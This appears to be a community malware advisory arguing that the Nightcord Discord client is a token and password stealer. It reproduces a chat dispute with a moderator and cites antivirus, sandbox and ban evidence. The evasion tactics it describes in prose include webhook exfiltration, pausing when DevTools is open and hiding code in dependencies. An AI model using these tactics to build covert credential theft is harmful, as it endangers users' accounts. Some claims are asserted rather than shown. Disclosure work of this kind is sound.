Nightcord Security Analysis Report - Threat Investigation

A security researcher known as Mayu has confirmed that the popular custom Discord client Nightcord is a Trojan-PSW (Password Stealer) and token grabber, disguised as an optimized client with over 30,000 members. The 624.12 MB client, which forked legitimate open-source code from Vencord and Equicord, bundles a silent data-harvesting payload that executes stealth memory and directory queries in the background. GitHub Security has permanently banned the project's repositories after the threat was verified through static scans, sandbox execution logs, and behavioral analysis.

Author:⛧Mayu⛧. / immayunnaise Status:CLOSED Threat Confirmed Target:Nightcord Discord Client 624.12 MB Bloated Archive Classification:Trojan-PSW Password Stealer / Token Grabber As a beginner in malware analysis, this report details my first hands-on threat investigation. My initial hypothesis was based on behavioral anomalies the unexplained 600MB file size and immediate bans applied by the client's staff when questioned . To build this document, I manually gathered static scans, isolated the files within secure cloud sandboxes, and documented the community infrastructure blocks. Because I am learning the advanced concepts of reverse engineering and forensics, I used AI as an architectural guide and technical translator. This collaboration allowed me to properly structure my raw findings sandbox execution logs, packet behavior, and staff logs into a professional, industry-standard Markdown format. This report represents a dual effort: my manual field investigation combined with guided technical validation. It serves as a personal learning milestone and a public prevention advisory. Nightcord is a custom, modified Discord client that has recently gained massive popularity among players, reaching over 30,000 members through viral marketing campaigns on TikTok and alternative networks. It is advertised as an ultra-optimized client providing "premium visual bypasses," custom themes, and exclusive plugins without restrictions. In reality, the developers behind Nightcord cloned forked the legitimate code of open-source client modifications like Vencord and Equicord. However, they completely wiped the development history of the original 200+ authors to conceal their own modifications. The security community officially accuses Nightcord of executing Supply Chain Attacks. The developers bundle a highly targeted, silent data-harvesting payload inside their massive 600MB client distribution files. While the client renders a functional Discord interface to keep the user oblivious, it executes stealth memory and directory queries in the background to compromise user infrastructure. | Metric | Value / Status | Technical Significance | |---|---|---| Primary Engine Detection | Red: HEUR:Trojan-PSW.Multi.Disco.gen | Verified Password & Discord Token stealer routine. | Sandbox Behavior Score | Orange: 50 / 100 - SUSPICIOUS | Automated runtime logs unauthorized OS child processes. | Payload Envelope Size | Package: 624.12 MB | Binary bloating used to evade automatic cloud scanners. | Infrastructure Status | X: PERMANENTLY BANNED | Official GitHub repositories terminated by GitHub Security. | When confronted with cryptographic and behavioral evidence, Nightcord network administrators and staff members deploy defensive technical gaslighting. Below is the complete chronological audit of the discussion with atomic a French community moderator for Nightcord , divided by individual chat screenshots. - Mayu 2:55 PM : Sends the initial project file tree analysis repository - atomic 3:11 PM : "Yes, that's the archive. You can check the source code." - Mayu 3:12 PM : "Well, exactly. Check the official security mirror at https://github.com/imide/nightcord https://github.com/imide/nightcord " - Analysis: The investigator initiates the audit by providing the official independent security mirror repository tracking Nightcord. This mirror openly labels the project as malware, establishing the baseline for the investigation. - atomic 3:12 PM : "Well, yeah." - Mayu 3:12 PM : "And then?" - atomic 3:12 PM : "Well look inside, there is nothing." - Mayu 3:12 PM : Sends the VirusTotal threat scan sheet identifying the malicious payload - Mayu 3:12 PM : "And I don't think I need to draw you a picture." - atomic 3:19 PM : "You can look at the source... There is nothing inside." - Mayu 3:19 PM : "Well, yes there is." - atomic 3:19 PM : "Nope." - Mayu 3:19 PM : "Literally." - atomic 3:19 PM : "It's just a false positive, bro." - Analysis: When presented with official multi-engine telemetry, the moderator instantly dismisses the findings as a "false positive". He attempts to redirect the conversation toward reading local source files, ignoring behavioral detection loops. - Mayu 3:19 PM : "Man, check the GitHub repository, please." - atomic 3:19 PM : "Find me the specific malicious line, please The line and the file." - Mayu 3:19 PM : "The local text code itself isn't the only issue." - atomic 3:19 PM : "You win 500 euros from the developer if you manage to find a backdoor line." - Mayu 3:20 PM : "It's about what the client actually executes in the background." - atomic 3:20 PM : "Well, find me one single line." - Mayu 3:20 PM : "We analyzed everything." - atomic 3:20 PM : "Same for me, based on reverse engineering experts using IDA Pro." - atomic 3:20 PM : "Well, find me one line." - Mayu 3:20 PM : "The issue comes from the remote servers, not just the local code. Our info goes straight into a database known to data protection services." - atomic 3:21 PM "Prove it to me then " - Mayu 3:21 PM : "Scan your own PC's network packets yourself. I've spent 3 hours in voice chat with reputable developers who built a client from scratch under multiple licenses, and they showed me everything." - atomic 3:21 PM : "You can use IDA Pro, bro. You'll see. There's nothing " - Mayu 3:22 PM : "It's easy to tell me to use an analysis tool that you guys bypassed. x " - atomic 3:22 PM : "We bypassed nothing. I'm just a regular user like you from the start, lmao. I just checked everything myself." - Mayu 3:23 PM : "you poorly check" - atomic 3:23 PM : "nope, this is you" - Mayu 3:23 PM : "did you even try to find obfuscated files ?" - Mayu 3:24 PM "how we can bad search if we found somthing not supposed to be here ?" - Analysis: The moderator introduces a financial bounty to challenge the investigator, a classic psychological tactic to build unearned trust. He also mentions using IDA Pro, which is an analytical tool built for native compiled machine code .exe/.dll , completely irrelevant for auditing high-level Electron JavaScript. - Mayu 3:31 PM : "Just with this, I think you should start to understand. Look at the sandbox run at https://metadefender.com/results/file/YnpJMk1EVXpNR3hzTUUwM1IzQnpjVWxHTkhOdFRubERZakZxX21kYWFzOTdmMGU5NDUwZg https://metadefender.com/results/file/YnpJMk1EVXpNR3hzTUUwM1IzQnpjVWxHTkhOdFRubERZakZxX21kYWFzOTdmMGU5NDUwZg " - atomic 3:32 PM Dumps a selective list of clean Vencord/Equicord API domains cloud.equicord.org, api.vencord.dev, ://groq.com to simulate a clean packet analysis - atomic 3:32 PM : "i give you this, anything analyzed" - Analysis: The moderator provides a filtered list of clean, standard API domains inherited from the original Vencord project. This is a network-layer misdirection. He purposely hides the fact that modern infostealers use official Discord Webhooks ://discord.com to exfiltrate data, blending the threat into completely legitimate HTTPS traffic. - Mayu 3:33 PM "this is open source client. easy to bypass, because code is free x so if you have nothing good for you" - atomic 3:34 PM "please check the code this is incr, idk when u found you guys but... just look with ida things u do with roblox dev u found nothing" - Mayu 3:36 PM : "wait" - atomic 3:36 PM : Lists standard Vencord source subfolders dist/, browser/, src/ "browser/, build/, dist/, ghost-server/, installer-src/... nothing obfuscated" - atomic 3:43 PM Sends a long paragraph claiming JavaScript cannot trick Wireshark and minimizing Kaspersky's HEUR flag - Mayu 3:51 PM : Sends detailed architectural response explaining that IDA Pro is useless on Electron, highlights clean mods score 0/66, and details anti-debugging concepts - Analysis: The actor shows a list of plain-text directories to argue that the project is completely open. This ignores the reality of Supply Chain Attacks, where malicious functions are minified or deeply hidden inside thousands of legitimate, nested Node.js dependencies. The investigator counters with explicit definitions of anti-debugging engineering. - atomic 3:57 PM : Argues Webhook POST requests would show up instantly in client DevTools F12 and demands registry code lines - Mayu 4:05 PM : Demonstrates the malware suspends exfiltration if F12 DevTools open, resuming after closure - atomic 4:08 PM : "You certainly have a vivid imagination, that's a quality, one might say. For a fork of an open-source Discord client, it's fascinating how far you dig yourself in. You claim the malware is so intelligent that it shuts down if it detects that DevTools or Wireshark are open. Congratulations You've just invented the first malware that's afraid of a keyboard shortcut. But seriously, think for two seconds: Nightcord runs on GitHub, not in a basement. If the code contained an anti-analysis routine, like detecting when the console is open or injecting debug scripts, this routine would be clearly visible in the project's public source code. Do you think we wouldn't see a window.addEventListener 'devtoolschange' or an environment check in the files? The ASAR source code is the GitHub code. If this logic existed, any developer would have seen it in two minutes on the repository. You insist that the exfiltration takes place on..." Discord's official API uses a webhook to make packets invisible amidst legitimate traffic. Let's say it's buried in the traffic, how could Kaspersky your one and only god in this conversation have guessed it was malicious exfiltration just by scanning a static .zip file? An antivirus that scans a closed file doesn't see the live network traffic. If it raises a PSW alert, it's only because it read the word "token" or a local file access function in an unsigned script. It's basic pattern matching, bro, you don't seem to know anything about it." - Analysis: The moderator claims that malicious traffic would easily show up in the DevTools Network panel. This represents a severe blind spot regarding Anti-Debugging mechanisms. Malicious scripts regularly monitor window properties; if browser inspector interfaces are flagged as active, the execution path instantly halts data exfiltration loops to remain invisible until the inspection tool is closed. - Mayu 4:08 PM : "it's why it have a keylogger too ?" - Mayu 4:08 PM : Sends investigation summary: clean Vencord is at 0, MetaDefender Sandbox flags dynamic behavior as SUSPECT at 50/100, and Orange ISP blocks the domain - atomic 4:11 PM : "A keyboard shortcut or a JavaScript event can't be magically intercepted. To intercept a shortcut, you need to write a function a keydown listener . If this function existed in Nightcord's code, it would be written in plain text in the ASAR source code. Do you think we wouldn't see a script checking the console state? Network analysis tools like Wireshark or proxies like Fiddler and Mitmproxy run outside of Discord at the operating system level. Your JavaScript malware has no way of knowing if I have Wireshark open on my second screen or if my router is logging packets. It can't go to sleep to avoid external network analysis, so my network dump remains 100% valid. Despite your theories, you're using the Supply Chain Attack argument, saying that a hacker hides three lines of code in the middle of thousands of legitimate dependencies. Nightcord is an open-source project hosted and built via GitHub Actions every time a build is generated." The scripts are routed through linters; you can't just slip three lines of code into an NPM dependency without the package manager detecting the file modification." - Analysis: The actor relies on the assumption that automated build steps or linting processes block malicious injection. This is incorrect: linters evaluate formatting and syntax correctness, they do not audit exfiltration logic. The investigator shuts down the argument by introducing the MetaDefender Sandbox dynamic runtime diagnostics. - Mayu 4:12 PM : Sends final response: syntax linter failures, MetaDefender dynamic anti-sandbox flag at 50/100, and official malware deletion by GitHub Security - atomic 4:13 PM : "wAllah your chatgpt is pathethic MDMRMRMR" - System 5:30 PM : Red: Your message could not be delivered. - Analysis: Out of technical arguments and unable to explain the dynamic runtime alerts or the official platform ban applied by GitHub Security, the moderator resorts to insults and completely blocks the investigator. This represents a total surrender under technical validation. This capture demonstrates that when the package is parsed, Kaspersky triggers a definitive HEUR:Trojan-PSW.Multi.Disco.gen signature 25-ji, Nightcord de. . This means the engine matched specific data-harvesting routines designed to query browser password databases PSW and extract active Discord authentication layouts Disco 25-ji, Nightcord de. . https://private-user-images.githubusercontent.com/132300486/600515705-7932285b-0727-4a4d-91d2-131d3e5ef3ef.png?jwt=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJpc3MiOiJnaXRodWIuY29tIiwiYXVkIjoicmF3LmdpdGh1YnVzZXJjb250ZW50LmNvbSIsImtleSI6ImtleTUiLCJleHAiOjE3ODAxODEyNTQsIm5iZiI6MTc4MDE4MDk1NCwicGF0aCI6Ii8xMzIzMDA0ODYvNjAwNTE1NzA1LTc5MzIyODViLTA3MjctNGE0ZC05MWQyLTEzMWQzZTVlZjNlZi5wbmc WC1BbXotQWxnb3JpdGhtPUFXUzQtSE1BQy1TSEEyNTYmWC1BbXotQ3JlZGVudGlhbD1BS0lBVkNPRFlMU0E1M1BRSzRaQSUyRjIwMjYwNTMwJTJGdXMtZWFzdC0xJTJGczMlMkZhd3M0X3JlcXVlc3QmWC1BbXotRGF0ZT0yMDI2MDUzMFQyMjQyMzRaJlgtQW16LUV4cGlyZXM9MzAwJlgtQW16LVNpZ25hdHVyZT00YTc4ZWRhYmEzMWU3OGIyMTcwOWU3NmNmZTZiYzdkZTk4NzRkZDk0Y2RjNzU1YzlhYTQ2MWFmNTA5NjEzYzMxJlgtQW16LVNpZ25lZEhlYWRlcnM9aG9zdCZyZXNwb25zZS1jb250ZW50LXR5cGU9aW1hZ2UlMkZwbmcifQ.Mq5POLKUuNXus8pxYnit15zEtX2JVULUuSAg2ElfMYY This capture displays the automated execution of the client inside a secure sandbox environment by OPSWAT INDEX . While static scans can be blinded by adding 600MB of null data binary bloating , the runtime sandbox logs a Threat Score: 50 / 100 - SUSPICIOUS INDEX . The telemetry logs reveal process spawning and outward host connections INDEX . https://private-user-images.githubusercontent.com/132300486/600515722-038521cc-6eec-40da-bc66-ceddaa234dc5.png?jwt=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJpc3MiOiJnaXRodWIuY29tIiwiYXVkIjoicmF3LmdpdGh1YnVzZXJjb250ZW50LmNvbSIsImtleSI6ImtleTUiLCJleHAiOjE3ODAxODEyNTQsIm5iZiI6MTc4MDE4MDk1NCwicGF0aCI6Ii8xMzIzMDA0ODYvNjAwNTE1NzIyLTAzODUyMWNjLTZlZWMtNDBkYS1iYzY2LWNlZGRhYTIzNGRjNS5wbmc WC1BbXotQWxnb3JpdGhtPUFXUzQtSE1BQy1TSEEyNTYmWC1BbXotQ3JlZGVudGlhbD1BS0lBVkNPRFlMU0E1M1BRSzRaQSUyRjIwMjYwNTMwJTJGdXMtZWFzdC0xJTJGczMlMkZhd3M0X3JlcXVlc3QmWC1BbXotRGF0ZT0yMDI2MDUzMFQyMjQyMzRaJlgtQW16LUV4cGlyZXM9MzAwJlgtQW16LVNpZ25hdHVyZT1mY2QwYjllZmMxZTBkZWZlNjkxMGExOTY0N2NkM2FjZGQwNWMzNjQ2N2RlOGQ0MTNjYmY0Nzg2Y2ZhYzY5NjNkJlgtQW16LVNpZ25lZEhlYWRlcnM9aG9zdCZyZXNwb25zZS1jb250ZW50LXR5cGU9aW1hZ2UlMkZwbmcifQ.E1ZfDJvFVyMdckpkgcrXYh5OMcCeDdk6R963jyH5zWg This capture shows the live network-layer firewall intercepting the Nightcord server routing requests on a mobile device INDEX . The automated systems blacklisted the domains under the official warning tag: "Cyberfilter / Theft of Confidential Data" INDEX . https://private-user-images.githubusercontent.com/132300486/600515733-000eb736-40b7-4b97-9357-77d899e8cb05.png?jwt=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJpc3MiOiJnaXRodWIuY29tIiwiYXVkIjoicmF3LmdpdGh1YnVzZXJjb250ZW50LmNvbSIsImtleSI6ImtleTUiLCJleHAiOjE3ODAxODEyNTQsIm5iZiI6MTc4MDE4MDk1NCwicGF0aCI6Ii8xMzIzMDA0ODYvNjAwNTE1NzMzLTAwMGViNzM2LTQwYjctNGI5Ny05MzU3LTc3ZDg5OWU4Y2IwNS5wbmc WC1BbXotQWxnb3JpdGhtPUFXUzQtSE1BQy1TSEEyNTYmWC1BbXotQ3JlZGVudGlhbD1BS0lBVkNPRFlMU0E1M1BRSzRaQSUyRjIwMjYwNTMwJTJGdXMtZWFzdC0xJTJGczMlMkZhd3M0X3JlcXVlc3QmWC1BbXotRGF0ZT0yMDI2MDUzMFQyMjQyMzRaJlgtQW16LUV4cGlyZXM9MzAwJlgtQW16LVNpZ25hdHVyZT00N2NhMDlkODNlMTdkNDY1ZmE5YjhlMmJhNDM0NzhjNDkwYTgwZjAwMjAxOWZkMjk5MzY5ODk0ZDljN2MyODEyJlgtQW16LVNpZ25lZEhlYWRlcnM9aG9zdCZyZXNwb25zZS1jb250ZW50LXR5cGU9aW1hZ2UlMkZwbmcifQ.qKXlNhqneIklGIuxKTyQdc0-u4IWf YuQXuAntsNoak This capture verifies that the official GitHub organization and repositories belonging to Nightcord were permanently deleted and banned by GitHub Security for malicious distribution INDEX . It showcases the safety warning mirror at https://private-user-images.githubusercontent.com/132300486/600515762-895c4db9-122c-4200-aff2-5a731b506ab4.png?jwt=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJpc3MiOiJnaXRodWIuY29tIiwiYXVkIjoicmF3LmdpdGh1YnVzZXJjb250ZW50LmNvbSIsImtleSI6ImtleTUiLCJleHAiOjE3ODAxODEyNTQsIm5iZiI6MTc4MDE4MDk1NCwicGF0aCI6Ii8xMzIzMDA0ODYvNjAwNTE1NzYyLTg5NWM0ZGI5LTEyMmMtNDIwMC1hZmYyLTVhNzMxYjUwNmFiNC5wbmc WC1BbXotQWxnb3JpdGhtPUFXUzQtSE1BQy1TSEEyNTYmWC1BbXotQ3JlZGVudGlhbD1BS0lBVkNPRFlMU0E1M1BRSzRaQSUyRjIwMjYwNTMwJTJGdXMtZWFzdC0xJTJGczMlMkZhd3M0X3JlcXVlc3QmWC1BbXotRGF0ZT0yMDI2MDUzMFQyMjQyMzRaJlgtQW16LUV4cGlyZXM9MzAwJlgtQW16LVNpZ25hdHVyZT0yNGFlNThhY2JiZGNhZmYxODVhYjk4YjRkMzc3NWU3MTQ3MzU4NWRkYzQxZGVmOGRkMWVhZDIxOGUwZGYxMzE1JlgtQW16LVNpZ25lZEhlYWRlcnM9aG9zdCZyZXNwb25zZS1jb250ZW50LXR5cGU9aW1hZ2UlMkZwbmcifQ.TcyQxKbC5ss2fAVAwGlH27O3-jKrJlFs7WTYm0umDKM https://github.com/imide/nightcord https://github.com/imide/nightcord declaring: "Do not use this software, it is malware." INDEX The moderator's defense falls apart under professional cybersecurity review due to three core blind spots: The IDA Pro Myth: The actor claims to audit asynchronous Electron JavaScript using IDA Pro INDEX . IDA Pro is built to disassemble compiled machine binary files .exe, .dll, native game cheats INDEX . Presenting it as an audit mechanism here is a technical misdirection INDEX . Anti-Debugging Evasion: The actor claims packet data is clean because it doesn't show up in local DevTools F12 INDEX . Modern commercial infostealers monitor window states and event hooks; if an inspector or debugger is detected, the payload instantly suspends exfiltration loops to appear clean until the tools are closed INDEX . Furthermore, exfiltration often passes through official Discord Webhooks ://discord.com , blinding casual network packet filters INDEX . The NPM Fallacy: The actor believes that GitHub Actions and syntactic code linters block malware injections INDEX . Linters verify formatting and syntax structures; they do not flag the logic of an outbound encrypted string traveling to a remote Command & Control C2 server INDEX . To independently verify the facts established in this investigation, reference the official telemetry data and community advisories below: Direct link to the live behavioral runtime analysis mapping rogue system child processes and suspicious connections INDEX . MetaDefender Cloud Sandbox Telemetry https://metadefender.com/results/file/bzI2MDUzMGxsME03R3BzcUlGNHNtTnlDYjFq mdaas :Documented mirror tracking the original repository enforcement ban by GitHub Security INDEX . GitHub Safety Mirror Archive https://github.com/imide/nightcord :The primary incident report written by Vencord's lead developer, showcasing the cryptographic hashes proving TokenLogger injections under the guise of "Premium Sync" in version 1.18.2 INDEX . Vendicated's Official Security Investigation Gist https://gist.github.com/Vendicated/bb30cb67878fa682bcee140f56af1531 :Threat notice issued by community moderators confirming the discovery of active Keyloggers and Tokenloggers within the Nightcord codebase INDEX . Reddit r/BetterDiscord Global Advisory Thread https://www.reddit.com/r/BetterDiscord/comments/1to06xo/how legitimate is nightcord plugin/ :Cryptographic hash registry mapping the compiled 624MB file to Kaspersky's official VirusTotal Threat Engine Database https://www.virustotal.com/gui/file/7136b8a614f924e30afa29444b7626d9041e36fc6a997150fda06535e8e36202?nocache=1 : HEUR:Trojan-PSW.Multi.Disco.gen warning INDEX .